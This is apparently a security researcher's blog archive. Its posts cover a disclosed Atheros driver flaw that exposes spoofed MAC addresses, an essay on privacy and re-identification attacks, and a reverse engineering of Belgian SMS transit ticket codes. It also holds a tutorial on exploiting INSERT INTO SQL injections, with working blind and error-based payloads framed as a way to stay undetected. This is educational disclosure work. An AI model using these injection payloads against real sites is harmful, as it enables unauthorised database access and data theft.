Mathy Vanhoef: research

Showing posts with label research. Show all posts

Sunday, 10 November 2013

Unmasking a Spoofed MAC Address (CVE-2013-4579)

Update: This vulnerability has been fixed in kernel 3.8.13.16 and above.

Certain Atheros wireless drivers do not properly update the MAC address when changed (spoofed) by a user. This allows an active attacker to retrieve the original MAC address. In short, spoofing your MAC address does not always hide the original MAC address.

Background

While working on the ath9k_htc driver (used by Atheros USB WiFi dongles) I noticed the driver did not properly set a spoofed MAC address. Though the device appears to use the newly assigned MAC address correctly, the flaw allows an attacker capable of injecting packets towards the target to uncover the original MAC address.

The cause of the problem lies in how the driver and hardware implement Multiple Virtual Interface (VIF) support. Using this technology a single wireless chip can listen on multiple MAC addresses. Because sending an acknowledgement to correctly received packets is done in hardware, a question that arises is how the wireless chip can quickly determine whether a wireless packet was destined for it. At first you'd think there must be some method to give the hardware a (possibly fixed length) list of MAC addresses to listen on. However, some devices uses a different strategy (and in particular Atheros devices uses this method). Their strategy is the following: the wireless chip has a register which contains the "main" hardware MAC address (mainmac), and a register containing a mask (macmask). Given an incoming frame destined for a particular mac (incmac), it sends an ACK and accepts the frame if and only if: (mainmac & macmask) == (incmac & macmask). You can see that macmask determines which bits of incmask (MAC of the packet being received) have to match those of mainmac. Essentially the macmask represents the locations where the bits of all the virtual MAC addresses are identical to the "main" hardware MAC address (mainmac).

To clarify, consider a device having two virtual interfaces, one with MAC address 72:40:a2:3f:65:5a and another one with address 8e:8e:95:cd:90:4e. In binary these MAC addresses are:

01110010 : 01000000 : 10100010 : 00111111 : 01100101 : 01011010

10001110 : 10001110 : 10010101 : 11001101 : 10010000 : 01001110

Now, macmask should consist of the bits where both these MAC addresses are the same (mathematically that's the negation of the XOR). In our example the mask would be:

00000011 : 00110001 : 11001000 : 00001101 : 00001010 : 11101011

So the wireless chip can pick either 72:40:a2:3f:65:5a or 8e:8e:95:cd:90:4e as its main MAC address, and then set the mask to 03:31:c8:0d:0a:eb. Frames sent to either of these MAC addresses will now be accepted and acknowledged. For more details see the comments in the atheros driver source file. Unfortunately this technique has the side effect that the wireless chipset now listens on more MAC addresses then we really want, as not all bits of incoming frames are checked!

Vulnerability Details

When a MAC address is spoofed the driver does not simply update the mainmac register. Instead the mainmac register will still contain the original MAC address, and macmask will contain the bits where the original and spoofed MAC agree (see previous section). The wireless chip will acknowledge frames sent to the spoofed MAC addresses, and the operating system will include the spoofed MAC address in all packets, so everything will seem to work properly. Unfortunately this method allows an attacker to uncover the original MAC address bit by bit (given the spoofed MAC address). Specifically we can determine the value of any bit of the original MAC address as follows:

Flip the bit in the spoofed MAC address and send a packet to the modified MAC address.
We now have two cases:

The device replies with an ACK: This means the mask for this bit is zero, thus the bit in the spoofed MAC address was different than the original MAC address.
Device doesn't reply: This means the mask for this bit is one, so the bit we are guessing was identical to the bit in the spoofed MAC

By doing this for each bit, we eventually learn the complete original MAC address.

The vulnerability has been successfully exploited against AR7010 and AR9271 chipsets (which use the ath9k_htc driver) under following operating systems:

Debian 7.2.0 amd64 and i386
Kali 1.0.5 amd64 and i386
Ubuntu 13.10 amd64 and i386

The ath9k driver is not vulnerable (see comments below). The ath5k and ath10k were not tested and/or investigated. Other drivers also capable of creating multiple virtual interfaces with different MAC addresses, on a single device, might also be susceptible to the same vulnerability (so feel free test your device and post results).

Exploit

A proof of concept has been implemented in python using scapy. Given a MAC address that you suspect to be spoofed the tool will attempt to uncover the original MAC address. In case the tool returns the same MAC address as you entered, it means the target is not susceptible to the attack, or that the target is using the default MAC address of the device.

Patch

Update: I have made a patch and submitted it to the linux-wireless@vger.kernel.org mailing list (before this patch I also notified the ath9k-devel mailing list of the bug and filed a bug report for debian). The CVE ID of this bug is CVE-2013-4579.

Final Remarks

Though spoofing a MAC address can be done securely by simply updating mainmac, an attacker can use the same technique to learn that two virtual MAC addresses actually belong to the same user. So if you put up several virtual interfaces (possibly with random MAC addresses) they can be easily linked back together (again, that's if your device uses a method similar to the one described above). This flaw is inherent to usage of macmask and, at first sight, seems difficult to fix.

Wednesday, 1 February 2012

Foundations of Privacy

Privacy is a difficult concept and there are many sides to the privacy issues we are facing in our digital age. For my master thesis I studied privacy in databases, where the goal is to find a mathematical definition of privacy. But in this post I won't focus too much on the math behind it all, instead I'll go over some interesting observations I have made during my work, and explain some of the basic concepts. To get started we'll look at some privacy fiasco's that occurred in the past.

1. AOL Search Fiasco

We begin with the AOL search fiasco where AOL released around 20 million search queries from 65,000 AOL users. In an attempt to protect privacy, the username of each individual has been changed to a random ID. However, different searches made by the same person still have the same ID. Shortly after the release the person with ID 441779 was identified as Thelma Arnold. By combining all the searches she made, it became possible to find out her real identity. This already shows that simply removing unique identifiers such as a person's name, address or social security number do not provide privacy, and more generally that anonymity does not imply privacy (more on this later). No real care was given to anonymizing the search results. So this is not a true example that removing identifying attributes (eg., name, address, etc.) fails to protect privacy, as no real care was given to anonymizing the dataset. This can be deduced from the observation that the person who was responsible for releasing the data was quickly fired.

2. The HMO Records

In this attack the medical records of the governor of Massachusetts were revealed. The attack begins with the following observation: One can uniquely identify 63% of the U.S. population with only knowing the gender, ZIP code and date of birth of an individual. We now turn our attention to two different datasets. The first one is the voter registration list for Cambridge Massachusetts and includes information of each voter. A bit simplified the dataset can be represented using the following relation:

VoterRegistration(ZipCode, BirthDate, Gender, Name, Address, DateLastVoted)

The second dataset is the Massachusetts Group Insurance Commissions medical encounter data, containing medical information on state employees (and thus also contained the medical records of the governor of Massachusetts). A small part of this medical data, without all identifying information such as name, address and social security number removed, were released. It can be represented using the following relation:

MedicalData(VisitDate, Diagnosis, Procedure, ZipCode, BirthDate, Gender)

As we can see both datasets can be linked to each other by combining gender, ZIP code and date of birth! So even though the names were removed in the medical dataset, researchers were still able to link the data back to individuals. As a result the medical records of the governor of Massachusetts were found.

3. Kaggle

Finally we come to an example that shows it's possible to find correspondences between social networks merely based on the structure of underlying friendship relations. Even more interesting is that the art of "de-anonymizing" a dataset was used to win a competition. Kaggle organized a competition where participants were given a dataset of people and their underlying relations, which we will call a social graph (each node is represented using a random ID and no information such as username, name, location, etc. were included). An example of a social graph is shown in the figure below:

The circles/letters represent people and a line is drawn between them if they are friends. However not all relationships were given to the participants. In fact, the goal of the competition was to determine whether certain given relationships, which were not present in the original social graph given to the contestants, were fake or real. Of course if we'd knew who the individuals behind all the nodes are, we could just look up if two nodes are really friends or not! So if we manage to de-anonymize the social graph given by Kaggle we can game the competition: Instead of making a machine learning algorithm to predict the answer we simply look them up.

It was found out the social graph was created by crawling Flickr. So the researchers made their own crawl of Flickr and based on the structure alone created a mapping between their own crawl and the Kaggle social graph. In other words they now know which individuals correspond to the supposedly anonymous nodes, and thus they identified the individuals using only the structure of his or her social graph.

The Difficulty of Absolute Privacy Protection

It should be obvious by now: Assuring privacy is hard. We can't simply remove attributes such as name, address, social security number, etc. from a dataset. The reason is that seemingly innocent information such as gender, ZIP code, and birthdate can still be used to uniquely identify an individual. Clearly the need for a rigorous privacy definition is needed. Researchers have proposed theoretical models such a k-anonymity, but it turned out to have problems so L-diversity was suggested. I turn weakness were found in L-diversity, resulting in a new definition called T-closeness. But still there are problems even for T-closeness. So in practice assuring privacy is hard, and even finding a robust mathematical definition appears to be a challenging task. What can be done?!

Before answering that question we're going to argument that the situation, at least from a theoretical point of view, is even worse than one might already think. There is in fact theoretical evidence suggesting that absolute privacy protection is impossible. This proof was heavily based on an earlier attempt at the proof. Now of course not releasing your information does provide absolute privacy. But what they have proven is that if a database is sufficiently useful there is always a piece of external information that, combined with the output of the database, violates the privacy of an individual. An example explains this best. Assume that learning the salary of an individual is considered a privacy violation. Further assume that we know the salary of Alice is 200 EUR higher than the average salary of a Belgian citizen (this is the external information). So we don't know her exact salary. Let's say we now receive access to a database containing the salary of every Belgian citizen. From this database we can calculate the average salary of a Belgian citizen, say 2500 EUR. Combining this with the external information teaches us that the salary of Alice is 2700 EUR! Et voila, the privacy of Alice has been violated. All due to gaining access to a database from which we merely learned an average of a particular value.

So it seems it's very difficult (impossible) to assure that there will be no privacy violation whatsoever. What can we do? The answer is simple. We will reduce the probability of a privacy violation as much as possible.

Differential Privacy

One of the promising definitions in the privacy research community is called differential privacy. It provides relative privacy prevention, meaning that the probability of a possible privacy violating occurring can be greatly reduced. Important is that when using differential privacy the dataset is not handed out to the public. Instead users can pose questions (queries) to the dataset (eg., over the internet), and answers will be given in such a way to reduce the probability of a privacy violation. In practice this is done by adding a small amount of random noise to the answer. Note that there is always a tension between accuracy of the data, and the privacy guarantees provided by the data release. The higher the privacy guarantees, the lower the accuracy.

Differential privacy assures that, when you provide your personal information to the database, the answers to queries will not differ significantly. In other words handing over your information should not be visible in the calculated answers. This results in a more natural notion of privacy: When giving your information your privacy will on be very minimally reduced (remember that we consider absolute privacy protection impossible).

More formally, when you have two databases, one with your personal information (D1) and one without your personal information (D2). Them the probability (Pr) that an answer mechanism (K) returns a specific answer (S) should be nearly identical (multiplication by exp(epsilon)) for both databases. Mathematically this becomes

The parameter epsilon defines how much the probabilities are allowed to vary. A small epsilon such as 0.01 means the probabilities should be almost identical (within multiplicative factor 1.01). However for a larger epsilon such as 1 the probabilities can differ by a larger amount (they must now be within multiplicative factor 2.71). The reason we use the exp(epsilon) instead of just epsilon is because manipulating formulas that use exp(epsilon) is a lot more straightforward.

We can now design algorithms that answer queries while assuring differential privacy. In short we can now prove we assure a certain definition of privacy! There are still some difficulties in implementing differential privacy in practice. There first one is that it's not clear what a good value for epsilon would be. The second problem is that you cannot ask an unlimited amount of questions (queries) under differential privacy. So in practice a reliable mechanism must still be designed to ensure only a limited amount of queries are answered.

Another downside is that the actual dataset is not released. For researchers being able to visually inspect the dataset and first "play around with it" can be important to gain a better understanding of it. Therefore the problem of releasing an anonymous dataset, while minimizing the probability of a privacy violation, is still an important topic.

Anonymity vs. Privacy

Another important observation is that anonymity does not imply privacy. Take for example k-anonymity. It states that an individual must be indistinguishable to at least k-1 other individuals. Below we give an example of a 4-anonymous database. Based on the non-sensitive attributes, which are used to identify an individual, we notice there are always at least 4 rows having the same values. Hence each individual is indistinguishable with at least 3 other individuals.

If you know a person having Zip code 1303 and an age of 34 is present in the database, he or she can correspond to any of the four last rows. So the anonymity of that individual is preserved. However all four rows specify that he or she has cancer! Hence we learn our targeted individual has cancer. Anonymity is preserved while privacy was violated.

The Ethics of Using Leaked Datasets

Another observation made during my master thesis is that it's hard for academic researchers to obtain dataset to test their algorithms or hypothesis. Even worse is that most are forced to create their own datasets by crawling public profiles on sites such as Twitter, LiveJournal and Flickr. This means their test data only contains public profiles, creating a potentially significant bias in their datasets. Another problem is that researchers won't make these dataset publically available, probably out of fear of getting sued. And that is not an irrational fear, demonstrated by the fact that Pete Warden was sued by facebook for crawling publicly available data. Because these datasets are hard to obtain, peer review becomes difficult. If another, independent, researcher doesn't have access to the data he or she will have a very hard time trying to reproduce experiments and results.

But more interestingly is that there are public dataset available! It's just that no one seems to dare to use them. As mentioned the AOL dataset was publicly released, but researchers are hesitant to use it. Another dataset, called the Facebook100 data, is also a very interesting case. Researchers were given social graphs of 100 American institutions in anonymized form (private attributes such as name, address, etc. were removed). Amazingly the dataset contains all friendship relations between individuals present in the dataset, independent of their privacy settings on facebook. As we've seen an unmodified social graph can be vulnerable to re-identification attacks (see the Kaggle case). A week after the release facebook requested the dataset to be taken down. Deleting data on the internet is hard however, and copies of it are still floating around. Nevertheless, because facebook requested to dataset not to be used, researchers seem to be hesitant to use this dataset.

"Privacy issues are preventing a leap forward in study of human behavior by preventing the collection and public dissemination of high-quality datasets. Are academics overly-sensitive to privacy issues?"

It's clear why researchers aren't touching these datasets. Either they include too much personal information, the data provider has requested to take the dataset down, or out of fear of getting sued. The question is if this behavior really benifits the user, the one who we're trying to protect. The answer is NO. Let's look at all the players in this game:

Researchers don't conduct research on the "leaked" datasets. This hinders scientific progress.
Users are less aware of vulnerabilities as researchers can't demonstrate them.
Companies benefit as they don't get bad press about leaked data & possible privacy issues.
Malicious individuals benefit since vulnerabilities remain unknown, which in turns morivates users to continue sharing information publicly. They are also not limited by moral objections and will use the leaked data if valuable.

Currently only the companies and malicious individuals benefit from this behavior. Scientists and users are actually in a bad position by not allowing/doing research on public/leaked datasets. A utopian view would be that researches conduct analysis on the datasets and make advancements in their field. At the same time users can be warned about potential vulnerabilities caused by the leaked data before hackers will abuse them.

Fear Based Privacy

A mistake to watch out for, at least in my opinion, would be what I call fear based privacy. Yes, you have to remain diligent to make sure the government and companies don't collect too much information. And yes, you should be careful about the information you provide to the public! But one must first carefully consider the arguments for, and against, making information public. A knee-jerk reaction saying that any information you share might potentially be abused by a malicious individual is not a valid argument. It's an argument purely based on fear: "Even if we don't know yet how a hacker could abuse certain information, who knows he or she might find a method in the future, so it's better not to share anything."

Now don't get me wrong here. Currently I believe that an absurd amount of information is being collected, especially on the internet, and that this is not a good thing. But a good balance must be found between the benefit of sharing information, and the potential risks for sharing said information. Compare it to driving a car. It involves the risk of possibly getting in an accident. However, the benefit that a car provides outweighs its risks, and instead of completely avoiding cars we attempt to reduce the probability and severity of accidents.

Interesting Links

33 Bits of Entropy: Privacy related blog by the researcher Arvind Narayanan who is behind the Kaggle de-anonymization. He also has a twitter acount.
Database privacy at Microsoft Research.
28c3 talk by Conrad Lee titled Privacy Invasion or Innovative Science?
A Firm Foundation for Private Data Analysis: A good paper covering the applications of differential privacy.

Special thanks goes to Jan Van den Bussche of University Hasselt (Belgium) for helping me during my master thesis.

Wednesday, 26 October 2011

Exploiting 'INSERT INTO' SQL Injections Ninja Style

In the deep hours of the night you stumble upon a form where you are asked for, among other things, your nickname. You enter a single quote ' as your name and you get an error message saying: "You have an error in your SQL syntax". With high probability the SQL injection is taking place in an INSERT statement. Now, you could simply start sqlmap and let it try to do the dirty work. But there's a disadvantage: An automated tool will probably send some request where the INSERT statement succeeds. This will create strange entries in the database. We must avoid this to remain stealthy.

Let's create a similar situation locally and demonstrate this. Our test code is:

 <?php  
 $con = mysql_connect("localhost", "root", "toor") or die(mysql_error($con));  
 mysql_select_db("testdb", $con) or die(mysql_error($con));  
 $var = $_POST['post'];  
 mysql_query("INSERT INTO data VALUES ('one', '$var')") or die(mysql_error($con));  
 mysql_close($con) or die(mysql_error($con));  
 echo "The values have been added!\n";  
 ?>

Normally a good programmer will write better code than that, but it's just an example and will suffice to demonstrate the exploit. We run sqlmap against this using the command

./sqlmap.py -u "http://localhost/test.php" --data "post=ValidValue" -v 3

The (partly redacted) output of the command can be seen on pastebin. It found an error-based SQL injection. We will return to this result at the end of the post. For now we will ignore the error-based SQL injection and only notice that unwanted new database entries have been added by using sqlmap:

Avoiding unwanted inserts

We must find a query that is syntactically correct yet contains a semantic error. Moreover the semantic error should only be detectable by executing the query. I immediately thought of scalar subqueries. These are subqueries that must return only a single row, otherwise an error is thrown. As quoted from the MySQL manual:

In its simplest form, a scalar subquery is a subquery that returns a single value. A scalar subquery is a simple operand, and you can use it almost anywhere a single column value or literal is legal, and you can expect it to have those characteristics that all operands have: a data type, a length, an indication that it can be NULL, and so on.

An artificial example is:

SELECT (SELECT name FROM users WHERE email = 'bobby@tables.com')

If the subquery is empty it's converted to the value NULL. Now, if email is a primary key then at most one name will be returned. If email isn't a primary key it depends on the contents of the database. This proves that we must first execute the subquery and only then will we know if it's really a scalar subquery or not! Another variation where the subquery must be scalar is:

SELECT 'Your name is: ' || (SELECT name FROM users WHERE email = 'bobby@tables.com')

Here || stands for the string concatenation. The following query will always return the error "#1242 - Subquery returns more than 1 row" (tested with MySql).

SELECT (SELECT nameIt FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST)

Alright so we have a query that is executed yet returns an error. This prevents the original INSERT INTO command from being executed, yet our own SQL code will be executed. I will now show how to turn this into a usable blind SQL injection. We will create different behavior/results based on a boolean condition. We can follow two strategies to achieve this. The first is to find another semantic error and output a different error based on the boolean condition. The second strategy is to use a timing attack: If the condition is true the query will complete instantly, otherwise it takes a longer time. The timing attack is the easier one to create. Consider the following SQL statement, where we replaced the nameIt column of the previous SQL statement with a more advanced expression:

SELECT (SELECT CASE WHEN <condition> THEN SLEEP(3) ELSE 'anyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST)

If <condition> is true the server will sleep for 3 seconds and then throw an error that the subquery returned more than one result. Otherwise, if <condition> is false, it will instantly throw the error. All that is left to do is to measure the time it takes for the server to answer the query so we know whether the condition was true or not. We can use automated tools that perform the timing attack based on this foundation.

Let's return to our example php code. What do we need to set our argument called post to in order to launch the attack? Try figuring it out yourself first. This is something you must learn to do on your own, especially since you are given the source code.

Sending the following will do the trick:

' || (SELECT CASE WHEN <condition> THEN SLEEP(3) ELSE 'anyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) || '

This will expand to:

INSERT INTO data VALUES ('one', '' || (SELECT CASE WHEN <condition> THEN SLEEP(3) ELSE 'anyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) || '')

Which is valid SQL syntax!

Speeding up the attack

This is all good and well, but because it's a time based attack it can take an extremely long time to execute. We focus on the other strategy where we trigger different errors based on the boolean condition. First we need to find another error that we can trigger based on a boolean condition. Sound fairly straightforward, but it turns out generating an error is easy, yet finding errors that are generated whilst executing the query and controllable by a boolean condition can be quite hard. After more than an hour of messing around with some SQL statements and reading the MySQL documentation I finally found something usable! I got the following SQL statement:

SELECT 'canBeAnyValue' REGEXP (SELECT CASE WHEN <condition> THEN '.*' ELSE '*' END)

Here the construct 'value' REGEXP 'regexp' is a boolean condition that is true when value matches the regular expression regexp and is false otherwise. Note that '.*' is a valid regular expression and '*' is not. So when <condition> is true the regular expression will simply be evaluated. When it's false an invalid regular expression is detected and MySql will return the error "#1139 - Got error 'repetition-operator operand invalid' from regexp". Excellent! We can now create a boolean based blind SQL injection where the subquery error is returned if the condition is true, and the regular expression error is returned when the condition is false.

But there's a snag: One must be careful with the REGEXP error. Say you modify the time based SQL attack statement to the following:

SELECT (SELECT CASE WHEN <condition> THEN 'anyValue' REGEXP '*' ELSE 'AnyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST)

You reason as follows: If <condition> is false it will return 'thisCanBeAnyValue' twice and then throw an error that the subquery returned more than one result. If <condition> is true it tries to evaluate 'anyValue' REGEXP '*' and throw the regular expression error. But this is not what will happen! With this line you will always end up with the regular expression error. Why? Because MySql knows that 'anyValue' REGEXP '*' is a constant expression and doesn't depend on anything. Therefore it will optimize the query and calculate this value in advance. So even though <condition> is false it still attempts to evaluate the regular expression during the optimization step. This always fails, and hence the regular expression error is always returned. The trick is to put the '*' and '.*' in a separate SELECT CASE WHEN .. END control flow so it won't be optimized.

We conclude our story with the following SQL statement against our example code:

' || (SELECT 'thisCanBeAnyValue' REGEXP (SELECT CASE WHEN <condition> THEN '.*' ELSE '*' END) FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) || '

When the condition is false the regular expression error will be returned, and when the condition is true the subquery error will be returned. All this happens without the actual INSERT statement being successfully executed even once. Hence the website administrator will notice no weird entries in his database. And last but not least, this attack is faster compared to the earlier time based attack. Beautiful! :D

Even better: Error-based SQL injection

The previous methods were ideas I found myself. However the website is returning an error message, and there is a known error-based SQL injection technique that can return database entries in the error message. This is the type of attack that sqlmap also returned. With an error-based SQL injection we can greatly speed up the attack. The technique is based on the follow query:

SELECT COUNT(*), CONCAT('We can put any scalar subquery here', FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x

When we execute this command I get the message "ERROR 1062 (23000): Duplicate entry 'We can put any scalar subquery here' for key 'group_key'". As you can see the original input string is returned in the error message! In fact we can put any value we want there, including scalar subsqueries. Let's first investigate why this error is returned. In the MySql documentation we first notice: "You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times". RAND() will also be evaluated multiple times in a GROUP BY clause. Each time RAND() is evaluated it will return a new result. Okay, so according to the documentation we're actually not allowed to use the function RAND() like this. Why? Because the function returns a new value each time it's evaluated yet MySql expects a function to always return this same value. This can cause strange error messages like the one we just got.

One possible description of an Advanced Persistant Threat.

... people smarter than me found the "non-blind" error-based attack ...

Nevertheless the error message contains a user controllable string! Meaning we can let it return any database entry we want, which greatly speeds up the attack. But perhaps you're still wondering why this particular query fails. Well, answering that question means knowing exactly how the DBMS executes the query. Investigating this is way out of scope for this post. Just remember that in our query the problem is caused because the RAND() function is internally reevaluated and will return a different value, which is something the DBMS is not expecting.

Let's put this in our example code again. Something like the following will suffice:

' || (SELECT 'temp' FROM (SELECT COUNT(*), CONCAT((subquery returning the value we want to retrieve), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) FromTable) || '

Et voila, we have a very fast SQL injection. Depending on the tables we can access, this example might need to be modified in order to work properly. In particular we can also include one of the previous SQL injections that always generate an error. This way we will be sure data is never inserted. After all, we are relying on undefined behavior which causes the error to show up. Who knows if there exists another DBMS that handles these queries with RAND() in them differently and they don't produce an error.

As a last note, being stealthy is always a relative notion. In some cases SQL errors could be logged and an administrator could be notified when they happen. In such a situation this attack wouldn't be stealthy at all!

Follow me on twitter @vanhoefm

Addendum:

For Oracle 8, 9 and 10g databases the function utl_inaddr.get_host_name can be used to launch an error-based SQL injection. For Oracle 11g ctxsys.drithsx.sn and other functions can be used. [Source1] [Source2]

Monday, 3 October 2011

Update on SMS tickets of "De Lijn"

At our university we are forced to use PingPing to pay for our lunch. Only by paying using this system will we get a student discount. Whether this is a good system or not is if no relevance here and might be a good topic for another post.

Anyway you have to register an account at pingping.be. What's very interesting is that once you logged in you can also see when you purchased an SMS ticket! This confirms that every sold SMS ticket is stored in a database and they only need your phone number to confirm if a person has actually bought a ticket.

This also strengthens the argument that the codes used in the SMS are mainly a method so the bus driver can manually verify parts of the code. Of course that's an insecure method but increases the usability. If you know how the codes are constructed you can potentially fool a bus driver, but the actual inspectors will be able to tell it's a fake code.

Sunday, 21 August 2011

Brief look at SMS tickets of "De Lijn"

De Lijn, a public transportation company in Belgium, allows you to pay for your journey with a mobile phone. This is done by sending a SMS containing the letters “DL” to the number 4884. You then receive a conformation SMS that is similar to the following: “10* Valid on all vehicles of De Lijn on 18/08/2011 until 08h58. Price: 1,30 EUR 0758T18bk311Z4u429918”.

The readable date, hour and price are clearly to inform the user about the ticket he/she purchased. The code at the end seems to be an authentication code that might be used to check if your ticket is legitimate and not a counterfeit. The first number/symbol in the SMS also appears to have a special purpose as it’s not immediately clear for what it stands. The question is now how secure this system is.

According to the information page knowing your mobile phone number is enough to verify if you actually bought a ticket. This is again confirmed in the FAQ section in the answer to “What if my mobile phone’s battery is flat”. Here they state that in such an event you must give your phone number. They also say that a forwarded SMS ticket can be recognized as invalid, which is reasonable considering the ticket is registered to the phone number that paid for the ticket. From this it’s clear that you cannot cheat the system by trying to construct a fake SMS ticket, they don’t even need to see the code in the SMS to verify you bought the ticket! It means they store every SMS ticket sold combined with the phone number of the customer.

Nevertheless, the codes and numbers contained in the SMS ticket are still interesting. Let’s first collect a list of valid tickets by using the system and write down the information in an organized list:

Sender Nr Date Hour Code

+32476136809 09* 19/08/2011 17:41 1641t19bk527Q6a444464

+32476136808 08- 19/08/2011 08:50 0750s19rm527Q6f438993

+32476136804 04+ 18/08/2011 18:42 1742S18zk527Z4c436361

+32476136810 10* 18/08/2011 08:58 0758T18bk527Z4u429918

+32476136803 03* 18/08/2011 08:51 0751G18uz527Z4g429841

+32476136803 03+ 18/08/2011 08:51 0751G18vz527Z4k429838

+32476136815 15* 28/07/2011 20:26 1926L28tw527J1a265124

+32476136813 13/ 28/07/2011 13:44 1244I28us527J1n260332

+32476136816 16/ 06/05/2011 19:39 1839E06em527S4g349355

+32476136805 05/ 05/02/2011 16:44 1544f05vi527Z4m707955

From this we can derive several things. The first code 1641t19bk527Q6a444464 will be used to illustrate these observations:

Multiple phone numbers are used to send the ticket. The first two digits of the SMS ticket (see the column named "Nr") correspond to the last two digits of the phone number that send the ticket to the customer. For the first ticket in the list the first two digits are 09* and the sender was +32476136809.
The first four digits of the ticket code denote the time of when the SMS ticket was created/purchased. In the example code that time is 16:41.
The sixth and seventh digit stand for the day of the month the ticket was requested. In the example this is the 19th of the month.
The three digits in the middle of the code are the last three digits of the phone number that requested the SMS ticket. In the example the phone number of the customer is of the form 04xx/xxx527.
Although the meaning is still unknown, the following letter and number (in the example Q6) are correlated with the date the ticket was bought on. Notice that for tickets that are bought on the same day the number is always the same for every ticket.
The laster number is a counter that increases for every ticket created. In the example this number is 444464. This can be clearly seen from the two tickets bought on 18/08/2011 at 08:51. The first one has a number of 429838 and the second 429841. When this counter reaches 999999 it appears to be simply reset to zero.
It's unknown what the other letters/digits are for.

The reason some of this info is easy to reverse engineer is probably so the bus driver can do a basic check of the code himself. Using the first two digits he can check if the ticket has been received from the correct phone number and with the first four digits of the ticket code he can confirm how long the ticket is valid. Even though such checks don't guarantee security, it does increases the practical usability of the ticket code. But as already mentioned, you cannot cheat the system. Since they record every ticket sold an inspector will notice the counterfeit ticket is not in this list, and thus know you haven't paid anything.

Pages